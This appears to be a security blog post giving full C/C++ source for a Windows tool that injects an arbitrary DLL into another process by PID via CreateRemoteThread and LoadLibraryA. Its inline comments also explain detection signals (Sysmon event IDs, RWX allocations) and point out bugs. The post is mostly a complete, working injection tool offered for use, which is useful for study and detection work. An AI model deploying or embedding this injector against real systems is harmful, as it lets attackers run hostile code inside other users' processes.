Wednesday, November 4, 2020

Continuing DLL Injection via CreateRemoteThread

In a previous post on DLL injection, the DLL details were hardcoded. In this post, you can specify the process ID and the DLL to be injected yourself.

/*
* DLL Injection - using create remote thread 
* This is a follow-up to my previous blog posts and as in the previous instance, 
*  this is purely for educational purposes.
* https://www.securitynik.com/2019/01/beginning-dll-injection-with-windows_23.html
* https://www.securitynik.com/2019/01/beginning-dll-injection-with-windows.html
* 
* In those previous posts, I required admin privileges. In this post, I'm working without admin privileges
* Author Nik Alleyne
* Author Blog: www.securitynik.com
* File: dllInjection-CreateRemoteThread.c
* Date: October 4, 2020
*/


#include <windows.h>
#include <Psapi.h>
#include <stdio.h>

/*
 * Entry point. Takes a target PID and a DLL path on the command line and runs
 * the textbook remote-thread injection sequence:
 *   OpenProcess -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread(LoadLibraryA)
 *
 * From a defender's point of view this exact four-call chain is the classic
 * signal for DLL injection: Sysmon records the OpenProcess as ProcessAccess
 * (Event ID 10) and the new thread as CreateRemoteThread (Event ID 8), and a
 * remote thread whose start address resolves to LoadLibraryA/W is a common
 * EDR detection rule.
 *
 * Returns 0 on success and -1 on a usage error or on any failed API call.
 * On every early return the process handle opened below is leaked; the
 * process exits right after, so this is harmless but not tidy.
 *
 * NOTE(review): despite the .c filename this file uses `nullptr` and the wide
 * literal L"kernel32.dll", so it is presumably built as C++ with UNICODE
 * defined -- confirm the build settings before compiling it as C11.
 */
int main(int argc, char* argv[])
{
	// Clear the screen before getting started.
	// system() spawns a cmd.exe child just to clear the console; that child
	// process shows up in process-creation logs alongside the injection itself.
	system("cls");

	// Check to see if the number of arguments, equals 3.
	// First argument is the program, second is the process PID and third is the full path to the DLL
	
	if (argc != 3)
	{
		printf(" ===========================================================================\n");
		printf("[*] Usage info. | dllInjection-CreateRemoteThread.exe \n");
		printf("[*]");
		printf("dllInjection-CreateRemoteThread.exe PID Path to DLL \n");
		printf("\t eg. dllInjection-CreateRemoteThread.exe 3000 c:\\tmp\\mydll.dll \n");
		printf(" ===========================================================================\n");
		return -1;
	}

	printf("                  Beginning the DLL Injection Process ... \n");
	printf("------------------------------------------------------------------------------ \n");
	Sleep(1000);

	printf("[*] Enumerating all processes ... \n");
	Sleep(1000);

	// Setup point to the array which will hold the processes.
	// EnumProcesses fills myProcessList with PIDs and stores in sizeOfArray the
	// number of BYTES written, not the number of entries. The buffer is a fixed
	// 4096 entries; the API does not fail when the list does not fit, it just
	// fills the buffer, and there is no check here for that case
	// (sizeOfArray == sizeof(myProcessList) is the documented hint).
	DWORD myProcessList[4096], sizeOfArray, totalProcesses;
	if (!EnumProcesses(myProcessList, sizeof(myProcessList), &sizeOfArray))
	{
		printf(" [!] Error Code: %u was encountered while retrieving processes information \n", GetLastError());
		return -1;
	}

	// calculate the number of processes returned (bytes -> DWORD entries)
	totalProcesses = sizeOfArray / sizeof(DWORD);
	printf(" [*] There were %u processes found \n", totalProcesses);
	Sleep(1000);

	// atoi() has no error reporting: a non-numeric argument silently becomes 0,
	// and the int it returns is printed with %u throughout (a negative value
	// would print as a large unsigned number).
	printf("[*] Searching for process with PID:%u \n", atoi(argv[1]));
	// Create a variable to track if the PID was found
	BOOL pidFound = FALSE;

	// Find the process with PID of interest
	// first declare a counter for the array
	unsigned int count = 0;
	// The first for-clause `count` is an expression with no effect; count was
	// initialised on the line above. The comparison is DWORD vs int, so a
	// negative PID argument is converted to unsigned before comparing.
	for (count; count < totalProcesses; count++)
		if (myProcessList[count] == atoi(argv[1]))
		{
			pidFound = TRUE;
			break;
		}
	

	if (!pidFound)
	{
		printf(" [!] Unable to locate the process with PID:%u \n", atoi(argv[1]));
		return -1;
	}
		
	printf(" [*] Process with PID:%u Found \n", atoi(argv[1]));
	Sleep(1000);

	// Now that the PID exists, open a handle to it.
	printf("[+] Opening a handle to process with PID:%u  ...\n", atoi(argv[1]));

	// PROCESS_ALL_ACCESS is requested; this is the GrantedAccess value a Sysmon
	// ProcessAccess (Event ID 10) rule would see. The second argument is the
	// BOOL bInheritHandle, so NULL here simply means FALSE. Without admin /
	// SeDebugPrivilege (see the header comment) this presumably only succeeds
	// for processes owned by the same user at an integrity level no higher
	// than this program's -- protected or elevated targets fail here.
	HANDLE myRemoteProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, NULL, atoi(argv[1]));
	if (!myRemoteProcessHandle)
	{
		printf(" [!] Error %u occured while attempting to get a handle \n", GetLastError());
		return -1;
	}
	
	printf(" [+] Handle 0x%p successfully opened \n", myRemoteProcessHandle);
	Sleep(1000);

	// Allocating space in memory.
	// 256 bytes committed as PAGE_EXECUTE_READWRITE inside the target. The region
	// only ever holds the path string that LoadLibraryA reads, so the execute
	// bit is never used; an RWX allocation in a foreign process is itself a
	// high-signal event for memory-scanning tools. Freshly committed pages are
	// zero-filled, which is what supplies the string's NUL terminator below.
	VOID* myRemoteProcessAddress = VirtualAllocEx(myRemoteProcessHandle, NULL, 256, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	if (!myRemoteProcessAddress)
	{
		printf(" [!] Unable to allocate space in the process. Error code was %u \n", GetLastError());
		return -1;
	}

	printf(" [+] Space successfully allocated \n");
	Sleep(1000);

	// Writing DLL Path to process Memory.
	// Writes strlen(argv[2]) bytes -- the terminator is not copied (see the
	// zero-fill note above) and the length is never compared against the
	// 256-byte allocation, so an over-long path writes past the requested size.
	// The final nullptr discards lpNumberOfBytesWritten, so a short write would
	// not be noticed.
	printf("[+] Writing to the process memory ... \n");
	if (!WriteProcessMemory(myRemoteProcessHandle, myRemoteProcessAddress, argv[2], strlen(argv[2]), nullptr))
	{
		printf(" [!] Error %u encountered while writing to the process with PID:%u memory \n", GetLastError(), atoi(argv[1]));
		return -1;
	}
	printf(" [+] Process memory successfully written ... \n");
	Sleep(1000);

	// Executing the remote thread.
	// The start routine is LoadLibraryA as resolved in THIS process; using that
	// address in the target relies on kernel32.dll being mapped at the same base
	// in both processes (system DLL bases are randomised per boot, not per
	// process). The thread's argument is the remote buffer holding the DLL path.
	printf("[+] Creating the remote thread ...\n");
	HANDLE myRemoteProcessNewThread = CreateRemoteThread(myRemoteProcessHandle, nullptr, 0, (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA"), myRemoteProcessAddress, 0, nullptr);

	if (!myRemoteProcessNewThread)
	{
		// Unlike the other error paths this one does not report GetLastError().
		printf(" [!] Error occurred while creating remote thread!\n");
		return -1;
	}

	printf(" [+] Remote thread successfully created \n");
	Sleep(1000);

	// Close up shop.
	// Only the process handle is closed; myRemoteProcessNewThread is never
	// waited on or closed, so whether LoadLibraryA actually succeeded in the
	// target is never observed, and the thread handle lives until process exit.
	CloseHandle(myRemoteProcessHandle);
	printf("[*] I'm done my work. See ya and hope you enjoyed that demo! \n");
	
	return 0;
}



/*
* References:
* https://docs.microsoft.com/en-us/windows/win32/psapi/enumerating-all-modules-for-a-process
* https://docs.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-enumprocesses
* https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess
* https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights
* https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-writeprocessmemory
* 
*/

Have fun!
